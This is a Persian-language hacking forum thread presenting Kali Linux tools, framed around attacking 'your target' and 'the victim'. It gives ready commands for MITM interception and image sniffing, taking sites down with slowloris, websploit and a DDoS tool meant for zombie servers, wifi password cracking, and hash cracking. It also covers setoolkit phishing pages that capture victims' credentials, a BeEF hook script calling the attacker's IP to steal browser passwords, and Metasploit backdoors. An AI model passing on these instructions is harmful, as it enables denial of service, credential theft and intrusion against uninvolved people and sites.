معرفی ابزار های کاربردی کالی لینوکس

[6pish]

با سلام خدمت اعضا و مدیران انجمن

 

بنده قصد دارم در این تاپیک به معرفی ابزار های کاربردی و مهم کالی لینوکس بپردازم

 

از مدیران انجمن تقاضا دارم در این تاپیک بنده را یاری کنند... 

 

 

نکته : چنان چه میزان تشکر کردن از تاپیک ها بالا برود اکسپلویت های جذاب کالی لینوکس نیز در تاپیک های بعدی قرار داده خواهد شد

[6pish]

معرفی ابزار Ettercap که از حملات معروف (MITM) می باشد 

 

برای ران کردن ابزار از این دستور استفاده کنید      ettercap -G

 

 

این ابزار به صورت گرافیکی و جذاب برای شما اجرا خواهد شد

با این ابزار میتونید یک حمله ساده MITM را انجادم دهید تا ترافیک اینترنت پیش از این که به مقصد برسد شنود و رهگیری شود و یا این که پکت ها را بعد از ارسال به وب گاه دیگری تغییر مسیر دهید

از دیگر قابلیت جالب این ابزار اینه که با این دستور driftnet -i eth0    میتونید عکس هایی که قربانی باز میکنه رو ببینید 

[6pish]

 3 ابزار مهم و کار آمد برای جمع آوری اطلاعات از تارگیت

 

1)  dmitry             

 

2) whatweb

 

3) whois

 

با این 3 ابزار بسیار مهم در زمینه جمع اوری اطلاعات از یک وبسایت یا سرور میتونید اطلاعات با ارزشی بدست آورید برای استفاده از این ابزار ها میتونید با زدن دستور h- بعد از نام هر ابزار در ترمینال کامند های لازم را برای شما نمایش داده خواهد داد

 

موفق باشید

*** فایل تصویری پیوست شد ***

پسورد فایل: guardiran.org

This is the hidden content, please

• ورود
• یا
• ثبت نام

[6pish]

معرفی ابزار های جهت جمع آوری اطلاعات و تست نفوذ به پنل های مدیریت محتوا   wordpress  &   joomla

 

 

جوملا (joomla): پنل مدیریت محتوایی است که امروزه خیلی از فروشگاه های اینترنتی و انواع وبسایت های دیگر ازش استفاده میکنند و هر چند وقت اسیب پذیری جدیدی در سایت های بزرگی مثل exploit-db از این پنل مدیریت محتوا به ثبت میرسد.

 joomscan یک ابزار کارامد جهت اسکن پلاگین ها و نمایش پلاگین های اسیب پذیر و کسب مجوز دسترسی به پنل های مدیریت جوملا می باشد.

 

 

ورد پرس (wordpress):  ورد پرس هم یکی از پنل های مدیریت محتوای قدرتمند در زمینه مدیریت محتوای وبسایت هست که نسبت به جوملا امنیت بیشتری دارد ولی امنیتش صددرصد نیست.

wpscan ابزاری قدرتمند جهت تست نفوذ و اسکن پلاگین ها وردپرس به کار میرود که با این ابزار میتونید سایت های وردپرسی را اسکن و نفوذ کنید.

 

 

چگونه بفهمیم که سایت جوملا هست یا وردپرس!!!

 

این سوال شاید برای بعضی از دوستان پیش بیاد برای این کار به ادامه ای دامنه لینک های پایین رو اظافه کنید هر موقه صفحه لاگین ادمین پیدا شد بدونید که سایت از این پنل استفاده میکنه

 

جوملا(joomla):       بعد از دامنه سایت قرار دهید       administrator/

وردپرس (wordpress):   بعد از دامنه سایت قرار دهید   wp-login.php/

[6pish]

 

معرفی ابزارهای برتر در زمینه تست نفوذ به شبکه های وایرلس

 

نکته: برای استفاده از از ابزار ها اسم هاشونو در کالی جستجو کنید

 

1) fern wifi cracker   <== کاملا گرافیکی با محیطی جذاب 

2) ghost phisher    <== کاملا گرافیکی با محیطی جذاب 

3) wifite            <== این ابزار گرافیکی نیست ولی برای نمایش دادن باگ wps کاربرد داره و برای ران کردنش اسمشو توو ترمینال بزنید اجرا میشه

5) kismet         <== این ابزار برای شنود پکت های درون شبکه وایرلس کاربرد داره ولی کار باهاش یه مقدار سخت تر از بقیه است

6) airecrack-ng     <== یکی از کاربردی ترین ابزار ها در زمینه تست نفوذ به شبکه های وایرلس میباشد ولی بدی که این ابزار دارد که بدون پیش نیاز های خودش به تنهایی کامل نیست و پیش نیاز های airecrack را در پایین قید میکنم

 

الف) airmon-ng

ب) airodump-ng

ج) aireplay-ng

*** اموزش تصویری پیوست شد ***

پسورد فایل:guardiran.org

This is the hidden content, please

• ورود
• یا
• ثبت نام

This is the hidden content, please

• ورود
• یا
• ثبت نام

This is the hidden content, please

• ورود
• یا
• ثبت نام

This is the hidden content, please

• ورود
• یا
• ثبت نام

[6pish]

معرفی ابزار قدرتمند sqlmap

 

sqlmap : ابزاری قدرتمند جهت تست نفوذ به سایت هایی که باگ sql را دارند که با بیرون کشیدن دیتابیس و خواندن table  و column  های اسیب پذیر قابلیت خواندن username و password ادمین اون سایت را دارد، که این ابزار شبیه به نرم افزار هویج (havij) در ویندوز هست ولی بسیار قدرتمند تر.

از قابلیت دیگه این ابزار اینه که خودش میتونه گوگل دورک برای خودش پیدا کنه یعنی دیگه لازم نیست شما برین بگردین توو گوگل سایت اسیب پذیر sql پیدا کنین.

 

 

**** اموزش تصویری ابزار پیوست شد...

پسورد فایل: guardiran.org

This is the hidden content, please

• ورود
• یا
• ثبت نام

[6pish]

معرفی پورت(port) اسکنر قدرتمند به نام nmap

 

nmap : یکی از قدرتمند ترین اسکنر های در زمینه کشف port باز می باشد که در 2 محیط کامندی با ترمینال و گرافیکی می باشد که

با دستور zenmap محیط گرافیکی برای شما باز خواهد شد.

 

اهمیت port: اگر ما ip را آدرس یه خونه در نظر بگیریم میشه گفت port همان در ها و پنجره هایی هستند که ما برای وارد شدن به آن خونه نیاز داریم حالا برای پیدا کردن در ها و پنجره های باز باید جستجو کنیم و اینجاست که nmap  خیلی از جاها به دردمون میخوره.

کلا ما 65436 اگه اشتبا نکنم port داریم که من مهم ترین شونو بهتون میگم

45   :  کابل شبکه 

80   : HTTP

443 : SSL یا همون ( https)

53   : DNS

21   : FTP

110 : POP3

25   : SMTP

23   : TELNET

3389:  VPS  یا  (ریموت دسکتاپ)

137 : NETBIOS

[6pish]

معرفی 2 ابزار برتر در زمینه کرک پسورد HASH شده

 

 

1) findmyhash : ابزاری قدرتمند در زمینه کرک انواع پسورد های hash شده md4 - md5 و... را به صورت انلاین  

کامند در ترمینال برای کرک هش:

findmyhash MD5 -h "5ca1c8de66ce8dd8cb2e59f53494" -g

در اینجا (5ca1c8de66ce8dd8cb2e59f53494) هش مورد نظر خودتون را در 2کوتیشن (") قرار دهید

2) john :  ابزاری فوق الاده قدرتمند در زمینه انواع پسورد های hash شده از دیگر قابلیت های جذابی که این ابزار داره اینه که قادر به رمز گشایی قوی ترین پسورد های (shado ) را توسط  wordlist که خود این ابزار دارد رمزگشایی میکند.

کامند در ترمینال برای کرک هش:

john --format=raw-MD5 /test-hash.txt

تذکر: هش را درون فایل txt قرار دهید به این صورت (password:5ca1c8de66ce8dd8cb2e59f53494) و در مسیر ابزار قرار دهید و مسیر را در خط فرمان تعریف کنید در غیر این صورت hash برای شما کرک نخواهد شد.

** ابزار نشان دادن نوع هش:   hash-identifier

اینم یک سایت قدرتمند انلاین در زمینه کرک پسورد های HASH شده:

This is the hidden content, please

• ورود
• یا
• ثبت نام

[6pish]

معرفی ابزار کاربردی و جذاب Maltego 

 

Maltego ابزای کاملا گرافیکی و جذاب جهت جمع آوری اطلاعات از یک دامین و سایر دامین های متصل به هم به صورت یک نقشه کامل و جامع به صورت گرافیکی و جذاب.

 

این ابزار توسط یک گروه زیرزمینی افریقایی توضیع یافت که با جمع آوری اطلاعات عمومی از تارگیت از جمله ایمیل ها شماره تلفن ها ip های متصل به یک دامین که میشود یک حمله را از قبل با این ابزار مورد سنجش و عملیات خود را طرح ریزی کرد و میتوان حمله هایی نظیر مهندسی اجتماعی را روی دامین ها انجام داد

 

نکته : برای اجرای این ابزار ابتدا بعد از باز شدن 1 پنجره باز میشه و بعد از چند next اقدام به ساخت اکانت شخصی برای خودتان کنید که کد تاییدیه به ایمیل شما ارسال خواهد شد و از محیط جذاب این ابزار لذت ببرید.

[6pish]

معرفی اسکنر های قدرتمند

 

vega : یک اسکنر خوب و کاملا گرافیکی برای اسکن ضعف های یک سایت یا سرور و... کاربرد داره با این اسکنر شما میتونین باگ هایی از جمله sql - xss و... را روی تارگیت خود پیدا کنید، از قابلیت دیگر این ابزار اینه که شما میتونین با معرفی کردن پروکسی لیست اسکن خود را با ip های جعلی آغار کنید تا هنگام اسکن ip شما log نشود.

 

w3af : اسکنر قدرتمند و گرافیکی در زمینه اسکن و کشف حفره های امنیتی شبکه میباشد ولی قدرتمند تر از vega.

 

skipfish ; یک ابزار فوق الاده در زمینه کشف حفره های امنیتی در قالب پروژه ، (منظور از پروژه اینه که خیلی وقتا براتون پیش اومده که اسکنر یک باگ نشون میده ولی شما هیچ اطلاعی ازش ندارین و فقط با اسکرین گرفتن از باگ میتونین اونو به دوستتون نشون دهید تا برسی کنه و نتیجه را بهتون بگه) این ابزار قابلیت اینو داره تا اسکن شما را در 1 فایل html ذخیره کنه و به صورت 1 صفحه html میتونین اسیب پذیری های تارگیت رو ببینین.

نکته: ابزار به صورت کامندی اجرا میشود و شما میتونین با دستور زیر اقدام به اسکن و ذخیره فایل خود در دسکتاپ کنید.

kipfish -o /root/Desktop/target

 

wapiti : اینم یک اسکنر قوی در زمینه کشف اسیب پذیری در محیط کامندی ترمینال

 

nikto : اینم یک اسکنر خوب در زمینه ارزیابی یک سایت هست ولی ضعفی که این ابزار داره هنگام اسکن یک سایت ip شما برای مدیر اون سایت مخفی نیست

 

sfuzz : یک ابزار فوق الاده در زمینه اسکن ریز به ریز لینک های سایت و بیرون کشیدن کل سورس کد های یک سایت کاربرد دارد (محیط ابزار کامندی در محیط ترمینال)

نکته: برای شروع به کار با این ابزار ابتدا باید در دایرکتوری ابزار شوید با دستور زیر

cd /usr/share/sfuzz/sfuzz-sampel

حالا با دستور زیر میتونین اسکن خود را روی یک سایت شروع کنین فقط توجه داشته باشین به جای site.com تارگیت خودتونو وارد کنید

 sfuzz -v -S site.com -T -p 80 -f /usr/share/sfuzz/sfuzz-sampel/basic.http

[6pish]

 معرفی اکسپلویت slowloris 

 

در خیلی از مواقه دوستان وقتی میخوان یک سایت رو اسکن کنند به یه باگی میرسن با یه همچین متنی Denial of Service Attack ولی نمیدونن که کاربردش چیه ولی الان برای شما توضیح میدم.

 

هنگامی که یک سایت با بار اطلاعات زیاد و پایین اومدن سایت که دیگر تحمل بار اظافی یا درخواست اظافی را ندارد ان باگ به وجود می آید و با اکسپلویتی که معرفی کردم میتونین در چند دقیقه سایت رو down کنین

 

حالا چی باعث میشه که سایت down بشه : از اونجایی که سایتی این باگ را داد بدونید توانایی دریافت پی در پی پکت های سنگین را ندارد و شما با این اکسپلویت میتونین با ارسال پکت های سنگین سایت را از دسترسی خارج کنید

 

تذکر : زمانی شما میتونین با این اکسپلویت یک سایت رو down کنین که این باگ رو در قسمت dns یا http داشته باشه چون این اکسپلویت روی شماره port 80 تنظیم شده است

راهنمای استفاده از اکسپلویت :

این اکسپلویت به زبان پرل نوشته شده است برای اجرای اکسپلویت در محیط ترمینال ابتدا به دایرکتوری اکسپلویت برید و بعد با زدن دستور زیر اقدام به down کردن سایت کنید 

تذکر: بجای sit.com تارگیت خودتونو بزنید

                         

 

   slowloris.pl -dns sit.com -port 80 -timeout 1 -num 10000 -cache/.

پسورد فایل : guardiran.org

This is the hidden content, please

• ورود
• یا
• ثبت نام

[6pish]

معرفی ابزار قدرتمند fcrackzip

 

ابزاری قدرتمند در زمینه کرک پسورد فایل های zip .

این بزار در محیط کامندی ترمینال می باشد که با معرفی 1 پسورد لیست پسورد فایل شما را کرک میکنه

کامند استفاده از ابزار :

fcrackzip -v -D -u -p /root/Desktop/passlist.txt /root/Desktop/test.zip

 

**** اموزش تصویری ابزار پیوست شد...

پسورد فایل: guardiran.org

This is the hidden content, please

• ورود
• یا
• ثبت نام

ویرایش شده در فِوریه 26 2017 توسط 6pish
اموزش تصویری پیوست شد...

[6pish]

معرفی ابزار apktool

 

یک ابزار کارامد برای اون دسته از دوستانی که که زمینه برنامه نویسی اندروید کار می کنند

با این ابزار شما قادر خواهید بود تمامی سورس کد ها و فایل های مورد استفاده در یک نرم افزار اندروید با پسوند apk را در بیارید

روش اول:

ابتدا شما باید فایل apk خود را در مسیر apktool ببرید (در مسیر زیر)

usr/share/apktool

روش دوم:

فایل apk خود را در دسکتاپ قرار دهید و با این دستور در ترمینا وارد دسکتاپ شوید cd /Desktop و با دستور زیر در محیط کامندی ترمینال فایل apk خود در پوشه apktool کپی کنید

cp test.apk /usr/share/apktool

تذکر: به جای test.apk نام فایل خودتون را بزنید

 با دستور زیر در ترمینال به مسیر فایل apk که شما کپی کردیدو ابزار میشوید

cd /usr/share/apktool

با دستور زیر اقدام به بیرون کشیدن سورس کد ها و فایل ها از apk خود کنید

apktool d test.apk

تذکر: به جای test.apk اسم فایل خودتونو بزنید

یکمی صبر کنید تا انجام بشه بعد میتونید به صورت گرافیکی در مسیر بالای ابزار بشید و 1 پوشه به نام فایل خودتون پیدا میکنید درون پوشه فایل های و سورس کد های apk شما موجود هست

 

جوری بیان کردم که همه ای کاربران مبتدی هم بتونن ازش استفاده کنند

موفق باشید

 

[6pish]

2 روش برای پیدا کردن صفحه لاگین ادمین سایت

 

روش اول:

با این روش ابزار قدرتمند websploit برای پیدا کردن صفحه لاگین اقدام میکنیم

نکته: دستورات زیر را به ترتیب در محیط ترمینال وارد کنید

websploit

use web/pma

/set TARGET

This is the hidden content, please

• ورود
• یا
• ثبت نام

run

تذکر: به جای sit.com ادرس سایت هدف را وارد کنید

روش دوم:

در این روش ما از یه ابزار استفاده میکنیم و ابزار برای شما پیوست خواهد شد ابتدا فایل را در دسکتاپ از حالا فشرده خارج کنید و در ترمینال با زدن دستورات زیر اقدام به اجرای ابزار کنید

cd /root/Desktop

python ad-finder.py

با زدن این دستورات ابزار برای شما اجرا خواهد شد و فقط شما با وارد کردن سایت هدف اقدام به بیرون کشیدن لینک لاگین ادمین میکنید

 

پسورد فایل:

guardiran.org

This is the hidden content, please

• ورود
• یا
• ثبت نام

[6pish]

معرفي ابزار chkrootkit

اول يه سري توضيح پيش نياز درباره دوستاني بدم که نميدونن rootkitچيه !!!

خب روت کيت يک ابزاري شبيه به بک دور (در پشتي) و يا شبيه به تروجان مي باشد ولي خيلي پيشرفته تر و زيرکانه تر که براي پنهان کردن خود از فايل هاي سيستمي کرنل استفاذه ميکنه که پيدا کردنش کاري بسيار سخت و طاقت فرساست به همين دليل نفوذگران علاقه شديدي به روت کيت دارند زيرا با نصب روت کيت روي سرور فرد هکر دسترسي دائمي به کل سرور را دارد و هميشه پنهان خواهد ماند.

حالا طبق توصيه بنده هيچ ابزاري به طور 100 درصد قادر به پيدا کردن روت کيت نيست ولي تا يک حدودي با اين ابزار و ديگر ابزار ها ميتونين روت کيت رو شناسايي کنيد.

با دستور زير وارد محيط ابزار شويد:

cd /usr/sbin

حالا با دستور زير اقدام به اسکن سيستم خود از روت کيت کنيد:

chkrootkit

موفق باشيد.

[6pish]

معرف ابزار crunch

crunch یک ابزار قدرتمند در زمینه ساخت پسورد لیست میباشد که در محیط کامندی قابل اجرا می باشد و شما با این ابزار میتونید هم به صورت فایل ذخیره کنید و هم میتونید مستقیم با دستورات زیر اقدام به ساخت پسورد لیست و تست پسورد هم زمان به تارگیت خود کنید.

دستور ساخت فایل پسورد لیست در محیط کامندی ترمینال:

crunch 4 6 0123456789 -o /root/Desktop/guardiran.txt

شما با این دستور میتونید یه پسورد لیست کامل از اعداد داشته باشید که در دسکتاپ شما به صورت فایل txt به نام گارد ایران ذخیره خواهد شد.

دستور کرک فایل با crunch که نیاز به ساخت پسورد لیست نباشه و دیگه لازم نباشه شما پسورد لیست بسازین و مستقیم با این دستور عملیات کرک رو انجام بدین:

نکته : در دستور زیر airecrack رو مثال میزنم که برای کرک پسورد wifi دیگه لازم نباشه پسورد لیست بدین

)crunch 8 11 0123456789 | airecrack-ng /root/(file-name)01.cap -w - -e (wifi-name

موفق باشید

[6pish]

معرفی ابزار مهم و کاربردی websploit

websploit  ابزاری قدرتمند در زمینه حملات تحت وب از جمله این عملیات ها عبارتند از حملات تکذیب سرویس دهی (dos) ، پیداکردن صفحات لاگین ادمین، حملات علیه سرویس دهنده های وایرلس و بلوتوث و بسیاری از امکانات دیگر.

با دستور زیر اقدام به اجرای این ابزار مهم کنید:

websploit

با دستور زیر اقدام نمایش اپشن ها و ابزار های مود استفاده برای ایجاد حمله خود استفاده کنید:

show modules

 با دستور زیر قدام به حمله کنید :(مثلاحملات dos)

use network/web killer

set TARGET site.com

run

نکته: به جای site.com تارگیت مورد نظر را وارد کنید.

موفق باشید.

 

*** فایل اموزش تصویری پیوست شد ***

پسورد فایل: guardiran.org

This is the hidden content, please

• ورود
• یا
• ثبت نام

[6pish]

      معرفی ابزار setoolkit برای ساخت صفحات تقلبی 

 setoolkit : ابزاری قدرتمند در زمینه ساخت صفحات جعلی و حملات روی ماشین ها و ایجاد دسترسی می باشد که در محیط کامندی ترمینال با وارد کردن اسم ابزار ،ابزار برای شما اجرا و اپشن های مربوطه برای استفاده ای شما نمایان خواهد شد و شما با انتخاب عددی اپشن مورد نظر عملیات خورد را آغاز کرده و بعد از وارد کردن ادرس سایت فایل index به همراه فایل txt که برای ذخیره اطلاعات وارد کرده قربانی میباشد در مسیر زیر برای شما ساخته خواهد شد.

var/www/html

نکته: چنان چه میخواهید فایل که سایت مورد نظر که فیک می باشد که خودتون ساختین با ست کردن ip لوکال خود درون ابزار و وارد کردن ip لوکال خودتون درون مرورگر سایت هدف برای شما باز خواهد شد .

نکته: چنان چه سایت مورد نظر در مرورگر بالا نیومد با دستو ر زیر آپاچی خود رو فعال کنید:

service apache2 start

و از دیگر امکانات جذابی که این ابزار داره میتونید با ست کردن روی متاسپلویت میتونید حملاتی نظیر ایجاد backdor روی سیستم عامل ها استفاده کنید و کلیه دسترسی ماشین قربانی را بدست بگیرید از جمله shell ، webcam و...

موفق باشید.

*** اموزش تصویری پیوست شد ***

پسورد فایل: guardiran.org

This is the hidden content, please

• ورود
• یا
• ثبت نام

[6pish]

معرفی ابزار BeEF برای پیاده سازی حملات تحت وب

BeEF در دسته ابزار هایی قرار دارد که در تست نفوذ استفاده می شود و برای اجرای حملات کلاینت در مقابل مرورگر های پر کاربرد که قابل مدیریت کلاینت های متصل به هم باشند با استفاده از اسیب پذیری xss است که از لینک ساخته شده توسط ابزار که از زبان جاوا اسکریپت نوشته شده به محض کلیک هدف به این لینک قربانی برای شما در ابزار به نمایش در میاد که شما میتوانید به عنوان زامبی ازش استفاده کنید

نمونه لینک:

<script type=text/javascript src=http:// your - ip>:3000/hook.js></script>

 *** با کلیک کردن قربانی به این لینک شما میتونید تمامی پسورد های ذخیره شده ای مرورگر قربانی و... رو از طریق کوکی های مرورگر هدف که توسط ابزار به شما ارسال شده است بدست بیارید.

نکته: ابزار کاملا با صفحه ای گرافیکی و زیباست که با اجرای این ابزار ابتدا از شما یوزرنیم و پسورد میخواد که هر دو beef می باشد.

موفق باشید

[6pish]

معرفی ابزار scapy

ابزاری قدرتمند در زمینه تولید بسته ، اسکن شبکه و شنود بسته ها می باشد

با این ابزار شما میتونید در شبکه بسته تولید کنید و پاسخ بسته را دریافت کنید.

با این دستور بزار برای شما به نمایش در میاد..

scapy

موفق باشید...

[6pish]

معرفی اکسپلویت DDOS Attack

 این ابزار به زبان پایتون نوشته شده است که با این ابزار قدرتمند شما قادر خواهید بود حملات dos , ddos سنگین را علیه تارگیت خودتون انجام دهید

نکته: چنان چه این ابزار را در سرور های زامبی خود اجرا کنید و به یه تارگیت حمله کنید قادر هست سایت ها و سرور های بزرگ رو down کنه.

پسورد فایل:   guardiran.org 

This is the hidden content, please

• ورود
• یا
• ثبت نام

[6pish]

معرفی ابزار Text Finde

فیشینگ از جمله حملاتی است که سعی در بدست اوردن اطلاعات شخصی شما در فضای اینترنت می باشد و شما به بهره گیری از این ابزار اقدام در خواندن اطلاعات صفحات جعلی کنید.

سوال: کار این ابزار چیه؟

حالا شاید برای شما سوال باشه که این ابزار چیکار میتونه بکنه , این ابزار به زبان پایتون نوشته شده است و شما بعد از پیدا کردن صفحات جعلی اینترنتی اقدام به استخراج اطلاعات ذخیره شده با پسوند txt در وبسایت کنید و طلاعات ذخیره شده در صفحات جعلی را دانلود کنید.

موفق باشید.

 

**** فایل پیوست شد

پسورد فایل guardiran.org

This is the hidden content, please

• ورود
• یا
• ثبت نام

[6pish]

معرفی ابزار xerosploit

ابزاری فوق العاده کاربردی برای کسانی که علاقه مند به حملات MITM هستند که این ابزار امکاناتی نظیر شنود پکت های درون شبکه , ربودن پسورد های درون شبکه و کلی امکانات دیگه.

این ابزار به صورت دیفالت روی کالی نصب نیست و شما با دستورات زیر میتونید اقدام به نصب ابزار در محیط ترمینال کنید:

apt-get update

apt-get upgrade

git clone https://github.com/LionSec/xerosploit
cd xerosploit && sudo python install.py
sudo xerosploit

با دستورات بالا ابزار برای شما نصب و در محیط کامندی اجرا خواهد شد.

موفق باشید

[6pish]

معرفی ابزار امنیتی Metasploit

 

متاسپلویت ابزاری کاملا متن باز برای متخصصین امنیت شبکه میباشد که با استفاده از متاسپلویت میتوان از آسیب پذیری های سیستم ها را مورد تست نفوذ قرار داد.

و این ابزار به صورت دیفالت از اکسپلویت های مختلفی بهره میگیرد ولی شما هم میتوانید اکسپلویت های شخصی خود را در محیط متاسپلویت اظافه کنید.

--> با استفاده از متاسپلویت شما قادر خواهید بود ب ساخت backdoor اقدام به پیاده سازی حملات از جمله به گوشی های هوشمند اندروید، ویندوز و دیگر نرم افزار های کاربردی کنید.

==> با دستور زیر اقدام به بالا آوردن محیط کنسولی متاسپلویت کنید:

msfconsole

هنگامی که نیاز به ماژول خاصی مثل pdf داشتید با دستور زیر اقدام به جستجوی ماژول های لازم کنید:

show pdf

با ست کردن هر ماژول با هر مرحله آپشن های لازم را با دستور زیر برای شما نمایش داده خواهد شد:

show options

---> و در ادامه با ست کردن پیلود گوش دهنده meterpreter اقدام به شنود شبکه، دسترسی به webcam، shell و ... کنید.

 

**** آموزش تصویری حمله به گوشی های هوشمند اندروید + رهگیری نفوذگر پیوست شد.

This is the hidden content, please

• ورود
• یا
• ثبت نام

This is the hidden content, please

• ورود
• یا
• ثبت نام

[milad32]

در در 1395/10/20, 23:17:18، 6pish گفته است :

معرفی ابزار قدرتمند sqlmap

 

sqlmap : ابزاری قدرتمند جهت تست نفوذ به سایت هایی که باگ sql را دارند که با بیرون کشیدن دیتابیس و خواندن table  و column  های اسیب پذیر قابلیت خواندن username و password ادمین اون سایت را دارد، که این ابزار شبیه به نرم افزار هویج (havij) در ویندوز هست ولی بسیار قدرتمند تر.

از قابلیت دیگه این ابزار اینه که خودش میتونه گوگل دورک برای خودش پیدا کنه یعنی دیگه لازم نیست شما برین بگردین توو گوگل سایت اسیب پذیر sql پیدا کنین.

 

 

**** اموزش تصویری ابزار پیوست شد...

پسورد فایل: guardiran.org

This is the hidden content, please

• ورود
• یا
• ثبت نام

 

سلام و عرض ادب

چطور بفهمبم که یه سایت باگ دیتابیسی داره ؟

القته منظورم باک های پنهان هستش ، نه id=1